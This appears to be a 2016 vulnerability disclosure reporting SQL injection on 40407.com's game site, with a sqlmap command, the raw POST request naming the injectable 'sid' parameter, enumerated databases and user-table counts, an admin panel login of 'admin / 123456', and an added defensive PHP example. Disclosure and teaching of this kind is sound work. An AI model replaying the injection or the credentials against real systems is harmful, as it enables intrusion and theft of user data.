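Vulnerability title
Game security: SQL injection on the 40407 game site (involving 500,000 user records) + weak password on a system
Vendor
40407.com
Reporter
黑色键盘丶
Submitted
2016-04-28 09:09
Disclosed
2016-06-12 11:00
Vulnerability type
SQL injection
Severity
High
Self-assessed rank
20
Status
Confirmed by vendor
Tags
PHP + numeric injection, injection techniques
Vulnerability details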
POST injection command: sqlmap.py -r 1.txt --dbs (injected parameter: sid)
=====================post_package========================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
Host: wan.40407.com
Proxy-Connection: keep-alive
Content-Length: 36
Accept: */*
Origin: http://wan.40407.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
name=heise123&gid=5&sid=32&isyk=
Database information
available databases [25]:
[*]`14x`
[*]`399wantg`
[*]`40407box_test`
[*]`40407box`
[*]`40407boxpt_test`
[*]`40407boxpt`
[*]`40407boxstat`
[*]`40407data`
[*]`40407kfz`
[*]`40407lol`
[*]`40407tqyt`
[*]`dkwdv {`
[*]`kp.ya58.cn`
[*]`s} \ x1a!\ x03!`
[*]`ucentir)\ x11`
[*]`xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*]团
Tables in the current database
Database: 40407boxpt
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900 |
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
| box_content_1_swydn | 2 |
| box_content_1_xbjz | 2 |
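+----------------------+---------+
-------------------------------------
Database: 40407boxpt (450,000 user records)
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| box_game_member | 450339 |
+-----------------+---------+
There are also more than 200,000 records that are probably card password information, 70-plus information records, payment information, and so on.
Because this is a time-delay injection, the data itself was not dumped.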
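A defensive illustration of the numeric injection reported above, added here and not taken from the report or from 40407.com's code. The table `demo_server`, the two function names and the sample rows are hypothetical; only the parameter names `gid` and `sid` come from the request.

```php
<?php
// Added example, not 40407.com's code. Constructed in-memory data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_server (gid INTEGER, sid INTEGER, name TEXT)');
$pdo->exec("INSERT INTO demo_server VALUES (5, 32, 'server-32'), (5, 33, 'server-33')");

// Vulnerable pattern: a numeric parameter concatenated without quotes.
// No quote character is needed to alter the query, so quote-escaping
// helpers give no protection for this kind of parameter.
function lookupVulnerable(PDO $pdo, string $gid, string $sid): array
{
    $sql = "SELECT name FROM demo_server WHERE gid = $gid AND sid = $sid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: strict integer validation, then bound parameters.
function lookupHardened(PDO $pdo, string $gid, string $sid): array
{
    $opts = ['options' => ['min_range' => 1]];
    $g = filter_var($gid, FILTER_VALIDATE_INT, $opts);
    $s = filter_var($sid, FILTER_VALIDATE_INT, $opts);
    if ($g === false || $s === false) {
        throw new InvalidArgumentException('gid and sid must be positive integers');
    }
    $stmt = $pdo->prepare('SELECT name FROM demo_server WHERE gid = :gid AND sid = :sid');
    $stmt->bindValue(':gid', $g, PDO::PARAM_INT);
    $stmt->bindValue(':sid', $s, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$tampered = '32 OR 1=1'; // constructed input: extra SQL after the number

echo count(lookupVulnerable($pdo, '5', '32')), " row(s), sid=32, vulnerable\n";
echo count(lookupVulnerable($pdo, '5', $tampered)), " row(s), tampered sid, vulnerable\n";
echo count(lookupHardened($pdo, '5', '32')), " row(s), sid=32, hardened\n";
try {
    lookupHardened($pdo, '5', $tampered);
} catch (InvalidArgumentException $e) {
    echo "hardened handler rejected tampered sid: ", $e->getMessage(), "\n";
}
```

Validation and binding are kept together on purpose: validation gives the handler a clean rejection path, and binding still protects the query if a validation rule is later loosened.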
================================================================================
http://tg.40407.com/admin/mainindex/index: log in with admin / 123456
The games' promotion information can be modified.

Some user information
